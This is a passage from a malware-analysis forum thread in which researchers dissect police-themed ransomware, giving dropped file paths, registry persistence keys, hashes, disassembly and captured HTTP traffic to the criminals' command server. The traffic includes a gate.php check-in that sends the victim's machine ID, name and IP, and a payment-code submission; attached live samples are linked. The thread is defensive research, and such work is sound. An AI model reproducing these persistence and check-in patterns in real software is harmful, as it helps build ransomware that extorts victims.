A forum for reverse engineering, OS internals and malware analysis 

Trojan Ransom / FakePoliceAlert

Forum for analysis and discussion about malware.

Re: Trojan Ransom / FakePoliceAlert

 #14788  by tachion
 Sat Jul 21, 2012 7:44 am
TeamRocketOps wrote:This one is new to me. It looks kinda like Reveton but does not load the same way. No webcam module on this one either. Only MoneyPak accepted as payment. These are in U.S.

Image

Creates 2 exe files -
Code: Select all
%appdata%\<Random.exe>
%userprofile%\<Random.exe>
Loads up via registry instead of ctfmon shortcut:
Code: Select all
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
<Random> = %appdata%\<Random.exe>

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
Windows Update Server = %userprofile%\<Random.exe>

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
<Random> = %appdata%\<Random.exe>

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
Shell = %appdata%\<Random.exe>
SHA256: cacdbffd53c111737c6fe8d10bbe5973ab1c0bf5379748156684d3f0a1c251c1
VT: 24/42
https://www.virustotal.com/file/cacdbff ... 342842317/

EDIT: Updated image link

This is Gimemo at my location looks like this :)
https://www.botnets.fr/index.php/Gimemo

Image

Re: Trojan Ransom / FakePoliceAlert

 #14794  by Xylitol
 Sat Jul 21, 2012 1:35 pm
Code: Select all
004542C1    6A 00           PUSH 0
004542C3    68 F4434500     PUSH 4543F4                    ; ASCII "You analyze, I earn the Moneyz :("
004542C8    E8 1F60FDFF     CALL 0042A2EC                  ; JMP to wininet.InternetOpenA
004542CD    8945 F8         MOV DWORD PTR SS:[EBP-8],EAX

hxtp://thestatspage01.com/status/
Active connections: 133 
server accepts handled requests
 23767839 23767839 95688247 
Reading: 0 Writing: 1 Waiting: 132 

hxtp://thestatspage01.com/phpmyadmin/
hxtp://thestatspage01.com/test/
hxtp://thestatspage01.com/sol/

---
GET /partner3/sol/mainsettings/settings.sol HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: thestatspage01.com
Connection: Keep-Alive

HTTP/1.1 200 OK

---

GET /partner3/sol/mainsettings/settings.sol HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: thestatspage01.com
Connection: Keep-Alive

HTTP/1.1 200 OK

---

GET /partner3/sol/mainsettings/settings.sol HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: thestatspage01.com
Connection: Keep-Alive

HTTP/1.1 200 OK

---

GET /partner3/universalbezahlung100/frankreich/index.php HTTP/1.1
Accept: */*
Accept-Language: fr
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: thestatspage01.com
Connection: Keep-Alive

HTTP/1.1 200 OK

---

POST /partner3/universalbezahlung100/frankreich/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://thestatspage01.com/partner3/universalbezahlung100/frankreich/index.php
Accept-Language: fr
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: thestatspage01.com
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache

ukashcode=0123456789325671&euro=100&submitpsc=soumettre+PaysafecardHTTP/1.1 200 OK

---

GET /partner3/universalpanel/gate.php?hwid=2140809940&pc=XYLITOL-F12F085&localip=192.168.142.128&winver=Windows%20XP%20Professional%20x32 HTTP/1.1
User-Agent: You analyze, I earn the Moneyz :(
Host: thestatspage01.com

HTTP/1.1 200 OK
fun user-agent.

Re: Trojan Ransom / FakePoliceAlert

 #14965  by Xylitol
 Wed Aug 01, 2012 2:07 pm
Gangstaservice winlock (http://www.xylibox.com/2012/08/gangstas ... liate.html)
https://www.virustotal.com/file/698dc6e ... 343829992/

Winlock Aff (http://www.xylibox.com/2012/08/winlock-affiliate.html)
https://www.virustotal.com/file/234e771 ... 343829996/
Attachments
infected
(475.21 KiB) Downloaded 81 times
infected
(45.73 KiB) Downloaded 75 times
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11
  • 14
 Return to “Malware”